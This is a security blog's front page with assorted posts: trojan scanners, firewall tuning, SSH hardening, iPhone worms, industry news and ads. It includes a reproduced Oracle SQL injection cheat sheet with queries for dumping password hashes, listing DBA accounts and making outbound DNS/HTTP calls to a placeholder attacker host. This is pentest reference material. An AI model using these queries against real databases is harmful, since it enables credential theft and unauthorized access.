onlinesecurityblog.info
[Online Security, Telco, Safety, Tips, Compliance, Standard]
Best Free Trojan Scanner/Trojan Remover
Mar 1st
Malware, trojans and threats
Most PCs are now connected to the Internet and networks, making easier the spread of malicious software (malware), which includes trojans (also known as trojan horses), viruses, worms, spyware, adware, rootkits and other malicious or unwanted programs.
Like spyware and adware, trojans can get onto your computer in a number of ways, including from a web browser, via e-mail, or in a bundle with other software downloaded from the Internet. You may also inadvertently transfer malware via a USB flash drive or other portable media. It is possible that you could be forced to reformat your USB flash drive or other portable device in order to eliminate the infection and avoid transferring it to other machines. (You don’t want to be the one who infected your network at work because you were bringing in some music to listen to.
Unlike viruses or worms, trojans do not replicate themselves but they can be just as destructive. On the surface, trojans appear benign and harmless, but once the infected code is run, trojans kick in and perform malicious functions to harm the computer system without the user’s knowledge.
For example, waterfalls.scr is a waterfall screen saver as originally claimed by the author, but it can be associated with malware and become a trojan to unload hidden programs and allow unauthorized access to the user’s PC.
Some typical examples of threats by trojans are as follows:
- Erase, overwrite or corrupt data on a computer
- Help to spread other malware such as viruses (by a dropper trojan)
- Deactivate or interfere with anti-virus and firewall programs
- Allow remote access to your computer (by a remote access trojan)
- Upload and download files without your knowledge
- Gather e-mail addresses and use them for spam
- Log keystrokes to steal information such as passwords and credit card numbers
- Copy fake links to false websites, display porno sites, play sounds/videos, display images
- Slow down, restart or shut down your computer
- Re-install themselves after being disabled
- Disable the task manager
- Disable the control panel
To minimise the threats, most PC users will need an effective anti-malware program to remove trojans along with other malware.
Anti-malware and anti-trojan programs
As more computer security developers are extending their product capabilities to address more than one type of malware, the boundary between different types of anti-malware programs is no more a clear cut and has become blurred.
For example, an anti-virus program such as AVG Anti-Virus covers not only viruses, but offers protection against spyware, adware and others. An anti-spyware program such as SuperAntiSpyware not only detects spyware, but removes trojans, rootkits and other threats. Likewise an anti-trojan program can offer to remove viruses, spyware and other types of malware.
More appropriately, these security products are to be classified as anti-malware programs rather than to be grouped by the name of the products.
In this respect, anti-malware products which are designed to detect and remove trojans more effectively than the others will be reviewed in this category.
How many anti-malware programs need to install?
|
Do you still need an anti-virus program plus an anti-spyware program and an anti-trojan scanner?
“For the majority of average users the answer is no. A single competent broad spectrum anti-malware product is enough.”
“Of course, not everyone is an average user. Users who engage in high risk activities, like sourcing their software from P2P services, should load up their PC with all the protection they can get. Similarly, there are users for whom the best possible protection is paramount, regardless of cost or performance implications. Finally, users of freeware scanners who cannot afford [or unwilling to pay for] a premium product may be well advised to use more than one signature-based scanner.”
– excerpted from Gizmo Richards’ Support Alert Newsletter Issue 156 April 2008.
|
Disclaimer
Despite their ratings in this review, some anti-malware programs in certain cases are able to detect more malware than the others depending on their designs, online databases and the infections on computers.
|
Discussion
|
||||
|
|
Other Related Products
|
|
These are a number of other free trojan scanners and removers which were brought up in comments here or noted from other sources. As they are not rated in this review, I am listing them here with brief descriptions and links to their sites for ease of reference.
http://www.securitydirectory.asia/articles/best-free-trojan-scanner-trojan-remover-22.html |
Optimizing Firewall Performance
Feb 24th
Check Point
- Use networks instead of address ranges in NAT.
- Avoid rules with Ident.
- Replace nested groups by flat groups.
- Be aware of configurations that SecureXL templates (fastpath) cannot handle, for example, security server, or syndefender.
- Note that SecureXL templates can be disabled from a certain rule onwards due to certain configurations such as client auth, time objects, etc.
- Be aware of configurations that SecureXL cannot handle, for example:
- FloodGate-1 (automatically disables SecureXL)
- Rules with user authentication
- Services with a port number range (disables connection-rate acceleration)
- Time object associated with the rule (disables connection-rate acceleration)
- Be aware of SmartDefense configurations that may impact performance:
- Network Security–>Fingerprint scrambling–>ISN spoofing
- Network Security–>Fingerprint scrambling –>TTL
Cisco all models
- Debug messages are known to affect performance.
PIX 6.3
- TCP Intercept is known to impact performance.
- If you are not using NAT and have no DNAT communications, disable the ILS fixup.
Cisco IOS Firewall
- Performance may be affected if the value of ‘ip inspect one?minute high’ is far greater than the value in the ’show ip audit stat’ command.
Cisco ASA
- Verifying TCP checksums may impact firewall performance.
- Ideal performance is achieved when traffic enters and exits ports on the same adapter or ports on adapters serviced by the same I/O bridge (ASA 5580).
Cisco FWSM
- Deep packet inspection may cause high CPU (all inspection engines except for SMTP are handled in software).
- Before release 3.1, non UDP or TCP or ICMP flows are handled on a packet by packet basis. With 3.1 and higher, the FWSM creates flows in NP1 and NP2.
- Be aware of features that are not offloaded to network processors, they will use the CPU.
- Built-in ACL optimization algorithm: FWSM Release 4.0 incorporates an algorithm capable of optimizing ACLs by coalescing contiguous subnets referred to in different access-control entries into a single statement and detecting overlaps in port ranges. Note that after the optimization process, the ACL is likely to be different from the original one.
Juniper (ScreenOS)
- ALG (application layer gateway) is applied globally to all policies by default but may have a major impact on performance. Disabling it on specific policies can make a significant improvement.
- On high-end firewall platforms, NS-5000, ISG-1000 and ISG-2000, with ScreenOS 6.2 and above, Juniper switched the default rule search algorithm from “hardware” (ASIC) to “software” (CPU). The software search algorithm provides faster policy search time compared to older versions, when the number of “rules” for a pair zone is more than 500 rules, but it could cause high CPU during policy changes.
- ScreenOS 6.1: using wildcard address/wildcard policy causes a performance penalty.
Fortinet
- Enable only the required management features you need. If you don’t need SSH or SNMP, don’t enable them.
- Enable only the required application inspections.
- Minimize use of alert systems. If you export syslog, you may not need SNMP or email alerts.
- Establish auto-updates (scheduled update) at a reasonable rate. Every 4 or 5 hours should be ok on most cases.
- Minimize use of Protection Profiles. If you don’t need a Protection Profile on a firewall rule, don’t put it there.
- Minimize use of Virtual Domains and avoid them completely on low-end models.
- Avoid Traffic Shaping if you need maximum performance. By definition, Traffic Shaping slows down traffic.
How to SECURE SSHD Deamon
Feb 23rd
Step 1: First of all we need to make a regular user, since we are disabling direct root login:
adduser admin && passwd admin
Step 2: Backup your current sshd_config
mv /etc/ssh/sshd_config /etc/ssh/sshd_config.bak
Step 3: Create a new sshd_config file
nano -w /etc/ssh/sshd_config
Step 3.1: Paste this code into the new file
## Change to other port is recommended, etc 2488
Port 22
## Sets listening address on server. default=0.0.0.0
#ListenAddress 192.168.0.1
## Enforcing SSH Protocol 2 only
Protocol 2
## Disable direct root login, with no you need to login with admin user, then “su -” you into root
PermitRootLogin no
##
UsePrivilegeSeparation yes
##
AllowTcpForwarding no
## Disables X11Forwarding
X11Forwarding no
## Checks users on their home directority and rhosts, that they arent world-writable
StrictModes yes
## The option IgnoreRhosts specifies whether rhosts or shosts files should not be used in authentication
IgnoreRhosts yes
##
HostbasedAuthentication no
## RhostsAuthentication specifies whether sshd can try to use rhosts based authentication.
RhostsRSAAuthentication no
## Adds a login banner that the user can see
Banner /etc/motd
## Enable / Disable sftp server
#Subsystem sftp /usr/libexec/openssh/sftp-server
## Add users that are allowed to log in
AllowUsers admin
Control + X to save
Step 4: Verify settings in the sshd_config you created
nano -w /etc/ssh/sshd_config
REMEMBER YOU SHOULD CHANGE THE PORT TO SOMETHING ELSE. ( Example Port 2488 )
Step 5.1: Add text to MOTD Banner file (/etc/motd)
nano -w /etc/motd
Step 5.2: Add this text, or something else of your choice
Private system, please log off.
Step 6: Restart the SSHD Daemon
service sshd restart
http://www.securitydirectory.asia/articles/how-to-secure-sshd-deamon-19.html
Tripwire steps into SIEM territory – Robert Westervelt
Feb 10th
Tripwire Inc. has announced plans to sell security information and event management (SIEM) technology, but analysts say it’s entering an already chaotic and crowded market where it is sometimes difficult for enterprises to thoroughly evaluate vendors.
The Portland, Ore.-based configuration management vendor is introducing Tripwire Log Center, selling log and event management software that can tie into many different systems.
The biggest challenge for enterprises is to get SIEM software to tap into event data from a variety of proprietary data sources, such as network firewalls and intrusion detection systems. The goal of SIEM products is to help collect and analyze all the activity data to determine the overall health of a network. In addition, SIEM systems are being deployed to give compliance auditors evidence that a company is maintaining log data and that someone within the organization is minding the network.
“All these tools were originally designed to take logs from security devices and correlate them for threat purposes,” said John Kindervag, a senior analyst at Cambridge, Mass.-based Forrester Research Inc. “There was never a movement to put payment application data into some of these things and with the various payment applications out there it can be a difficult process.”
With much of the interest in SIEM products driven by compliance initiatives, the market for SIEM products is jam-packed with vendors, many competing with similar products. Established names include Arcsight Inc., CA Inc., Intellitactics Inc., IBM, NetIQ Corp. and EMC’s RSA Security division. Other vendors include LogLogic Inc., NetForensics Inc., Novell Inc., Sensage Inc., Symantec Corp. and TriGeo Network Security Inc.
Most vendors sell SIEM appliances and prepackaged software, though there are no advantages to choosing an appliance over a software package. Alternatively, Kindervag said small and midmarket companies may eventually choose SIEM in a Software as a Service (SaaS) package.
Georgia Tech Creates New Online Master’s Degree in Information Security
Feb 9th
ATLANTA, GA (November 16, 2009) – The College of Computing today announced the creation of a new Master of Science in Information Security available online in a distance learning format, a flexible degree option for working information security professionals who want more than industry certification. Georgia Tech is the only university of its class certified by the National Security Agency (NSA) and the Department of Homeland Security as a Center of Academic Excellence in Information Assurance Education that offers the degree in an online format.
“Because of the growing sophistication of threats we face in cyber space, organizations that both build new security solutions and those that must utilize such solutions to protect their information technology assets will need qualified IS professionals with advanced knowledge of the field to address new security challenges,” said Mustaque Ahamad, Professor in the College of Computing’s School of Computer Science and Director of the Georgia Tech Information Security Center. “An organization’s reputation rests on its ability to safeguard its information and remain compliant with regulatory requirements. This requires a much broader, deeper understanding of the field than a certificate can supply.”
Georgia Tech is an established leader in the field of information security research and education, unique in its offering of a technical or policy specialization in the degree program. Close ties to the College of Management and the School of Public Policy in the College of Liberal Arts keep the policy track relevant while the technical portion of the degree is taught by faculty from a nationally ranked top ten computing program. Approximately 30 candidates per year are expected to be admitted to the distance program. Georgia Tech currently has over 25 faculty actively engaged in information security research.
“The rigor, breadth and depth of Georgia Tech’s MS in information security degree program comprehensively prepares students for the high level of accountability that information security leaders have in today’s environment,” said Christopher Rouland, CEO of Endgame and former CTO of IBM Internet Security Systems. Mr. Rouland, a recognized leader in the information security field, received the MS in information security degree from Georgia Tech in 2008.
The new online degree program offers the same course rigor and academic discipline that is found in the traditional on-campus curriculum. Each student is required to complete seven core courses and three additional courses in a self-selected technical or policy specialization. Core areas of study include Information Security, Applied Cryptography, Network Security, Secure Computer Systems, and Strategies and Policies. The technical specialization examines the dimensions of providing security for information processing systems, including secure operating systems and applications, network security, cryptography, and security protocols. The policy concentration focuses on the many non-technical possibilities of information processing and security, including domestic and international policy processes, organizational routines and innovation, risk perception, industry-government relations, and the constitutional framework for governmental actions. An applied research project must also be completed.
More information about the degree program can be found at http://www.securitydirectory.asia/articles/article-7.html
IPhone / SmartPhone Security
Feb 8th
There has been several well known threats to the iPhone which include : -
- “Rick Astley” Rickrolling worm – non malicious; affects only jailbroken (Unlocked to specific carrier) iPhones which have not changed their default password. When an iPhone is Jailbroken, it installs an OpenSSH daemon (I found this very strange!) which is left running on the device. The worm itself only changes the background to a picture of Rick Astley (The 90’s pop star) with the words “ikee is never going to give you up”. Commonly referred to as either the Rickrolling or ikee worm.
- Second worm based on same vulnerability as the Rickrolling/ikee one is Malware which is named iPhone/Privacy.A. “This worm sits on a PC and scans the IP space for signs of a Wi-Fi-connected iPhone with the default SSH password. Once it finds one it siphons all the user’s personal data, including e-mail, contacts, photos and other data.”. This was identified by Intego MAC security software firm shortly after the ikee worm.
- http://blog.intego.com/2009/11/11/intego-security-memo-hacker-tool-copies-personal-info-from-iphones/
- A third worm is even more malicious and is a physhing attack (Probably will be called ING worm?) as it redirects users to a false ING website to try and extract client information from the victim. This has not been named and there may not yet be a fix for this apart from resetting the phone back to factory default..
- Charlie Miller / Blackhat 2009 demonstrated a SMS vulnerability where all iPhones were affected (Not just jailbroken phones). This exploits a vulnerability with the way the phone handles memory for SMS and largely is caused from a flood of SMS control messages to the phone which either crashes the phone/reboots or gives the attacker access to execute malicious code! This also affects Google’s Android operating system as well but not much detail with that. As I understand Apple have released patch for this to resolve the issue. More information here:
- http://arstechnica.com/apple/news/2009/07/apple-patching-critical-sms-vulnerability-in-iphone-os.ars
- Mid November iPhone Botnet – Again against ‘jailbroken’ iphones. There are many still actively trying to connect to the Botnet controller but this is down. I found some updated information on the XS4ALL site: http://www.xs4all.nl/veiligheid/security.php. XS4ALL security group found this botnet worm.
- Another “Jailbroken” “Ransomware” worm which a Dutch Hacker is using to exploit the SSH vulnerability. There is a fair bit of information on this I found on Intego as well. The hacker is trying to get money from people who are infected more information here on Intego as well.
There are vulnerability scanners which can detect Jailbroken phones (Beyond Security and Nessus). I am sure the other vulnerability scan vendors will also have method to detect a Jailbroken iphone. Much as the device is now a handheld PC it is susceptible to any vulnerabilities that hackers find, so is important to keep the devices updated from Apple updates much like we are used to with Windows PC’s. Most of these attacks are based on the SSH vulnerability for Jailbroken phones – users who have not changed the default password are at risk. The SMS attack though demonstrates that there can still be vulnerabilities in the non broken iphones as well.
I guess though from a Service Provider perspective if a user has Jailbroken their phone then that is their bad luck if they are attacked, though the cost of bills from such attacks particularly botnet type of threats may give customers some very high and unexpected usage bills! They say approximately 8% of iphones are Jailbroken, and that iPhones account for 50% of the smartphone market now.
I am still trying to find out if IDP/IDS devices can detect signatures based on iPhone attacks. This should be possible though I have not been able to find any specific information on signatures and weather these are effective means to combat these threats.
Security Directory @ Asia
Feb 6th
When you have important information, products, services, or just advertisements that you want to publish on the internet, you may have a website as a tool to promote it on the Internet. Nowadays, it has become an average to create a website when people want to build a business whether it is the small, medium, or large business. Now, for those of you who are involved in the security products or services, and want to make them so popular on the Internet, there is the best Security Directory for submitting your security matters including blog, device, advice, and much more. It is www.securitydirectory.asia and it’s the best directory to submit anything about security. www.securitydirectory.asia can help you popularize your website or blog.
www.securitydirectory.asia has several security categories for you such as Advisories & Patches, Authentication, Blog, Physical, Firewall, Malicious Software, and more. Therefore, if you have information about security as mentioned in the categories of www.securitydirectory.asia, you can add the sites to their directory so other people all around the world can get the information. Of course, if you have a website or blog about security product or service, www.securitydirectory.asia should be the best place to make your blog or website more popular. Even if you want to make your blog listed in the Featured Listings, you can get it at www.securitydirectory.asia.
www.securitydirectory.asia is the Security Directory, the largest information security directory on Asia Region. I think now your blog or website can Get Listed in Security Directory, www.securitydirectory.asia, of course, when your blog or website is related to information security. Do not hesitate now to visit www.securitydirectory.asia to submit your website or blog.
Security Operation Center Related Job Offering
Feb 4th
Alchemy Security is hiring SOC Program Managers and Ops Leads in Phoenix, Minneapolis and Topeka. They’re looking for people who have experience running security intelligence analysis groups and SIEM. Please send CV’s to ps@alchemysecurity.com. These projects begin in February and March 2010. Principals only.
Oracle SQL Injection Cheat Sheet
Feb 3rd
http://pentestmonkey.net/blog/oracle-sql-injection-cheat-sheet/
| Version | SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’; SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’; SELECT version FROM v$instance; |
| Comments | SELECT 1 FROM dual — comment – NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name ‘dual’ when we’re not actually selecting from a table. |
| Current User | SELECT user FROM dual |
| List Users | SELECT username FROM all_users ORDER BY username; SELECT name FROM sys.user$; — priv |
| List Password Hashes | SELECT name, password, astatus FROM sys.user$ — priv, <= 10g. astatus tells you if acct is locked SELECT name,spare4 FROM sys.user$ — priv, 11g |
| List Privileges | SELECT * FROM session_privs; — current privs SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s privs SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, find users with a particular priv SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS; |
| List DBA Accounts | SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, list DBAs, DBA roles |
| Current Database | SELECT global_name FROM global_name; SELECT name FROM v$database; SELECT instance_name FROM v$instance; SELECT SYS.DATABASE_NAME FROM DUAL; |
| List Databases | SELECT DISTINCT owner FROM all_tables; — list schemas (one per user) – Also query TNS listener for other databases. See tnscmd (services | status). |
| List Columns | SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’; SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’; |
| List Tables | SELECT table_name FROM all_tables; SELECT owner, table_name FROM all_tables; |
| Find Tables From Column Name | SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; — NB: table names are upper case |
| Select Nth Row | SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — gets 9th row (rows numbered from 1) |
| Select Nth Char | SELECT substr(‘abcd’, 3, 1) FROM dual; — gets 3rd character, ‘c’ |
| Bitwise AND | SELECT bitand(6,2) FROM dual; — returns 2 SELECT bitand(6,1) FROM dual; — returns0 |
| ASCII Value -> Char | SELECT chr(65) FROM dual; — returns A |
| Char -> ASCII Value | SELECT ascii(‘A’) FROM dual; — returns 65 |
| Casting | SELECT CAST(1 AS char) FROM dual; SELECT CAST(‘1′ AS int) FROM dual; |
| String Concatenation | SELECT ‘A’ || ‘B’ FROM dual; — returns AB |
| If Statement | BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; — doesn’t play well with SELECT statements |
| Case Statement | SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1 SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2 |
| Avoiding Quotes | SELECT chr(65) || chr(66) FROM dual; — returns AB |
| Time Delay | BEGIN DBMS_LOCK.SLEEP(5); END; — priv, can’t seem to embed this in a SELECT SELECT UTL_INADDR.get_host_name(‘10.0.0.1′) FROM dual; — if reverse looks are slow SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — if forward lookups are slow SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — if outbound TCP is filtered / slow – Also see Heavy Queries to create a time delay |
| Make DNS Requests | SELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual; SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; |
| Command Execution | Java can be used to execute commands if it’s installed.
ExtProc can sometimes be used too, though it normally failed for me. |
| Local File Access | UTL_FILE can sometimes be used. Check that the following is non-null: SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’; Java can be used to read and write files if it’s installed (it is not available in Oracle Express). |
| Hostname, IP Address | SELECT UTL_INADDR.get_host_name FROM dual; SELECT host_name FROM v$instance; SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address SELECT UTL_INADDR.get_host_name(‘10.0.0.1′) FROM dual; — gets hostnames |
| Location of DB files | SELECT name FROM V$DATAFILE; |
Live Hacking 2010 Europe Workshop
Feb 2nd
The Live Hacking 2010 Europe workshop will be held in Prague, Czech Republic from March 16th to 18th, 2010. This ethical hackers training course will be conducted by Dr. Ali Jahangiri based on his new book ’Live Hacking: The Ultimate Guide to Hacking Techniques and Countermeasures for Ethical Hackers and IT Security Experts’.
Dr. Ali Jahangiri, the world-renowned information security and ethical hacking expert, is pleased to announce the Live Hacking 2010 Europe workshop – a definitive and comprehensive workshop for White-hat computer hacking. Based on his new book ’Live Hacking: The Ultimate Guide to Hacking Techniques and Countermeasures for Ethical Hackers and IT Security Experts’, the workshop will be held in Prague, Czech Republic from March 16th to 18th, 2010.
This practical workshop is designed to introduce IT professionals to the world of hacking and information security and give them the knowledge they need to thwart the criminal elements in cyberspace. Attendees will need to bring their own laptop and using virtual machines the participants will learn to hack and crack using the techniques and tools of real hackers.
More info at here
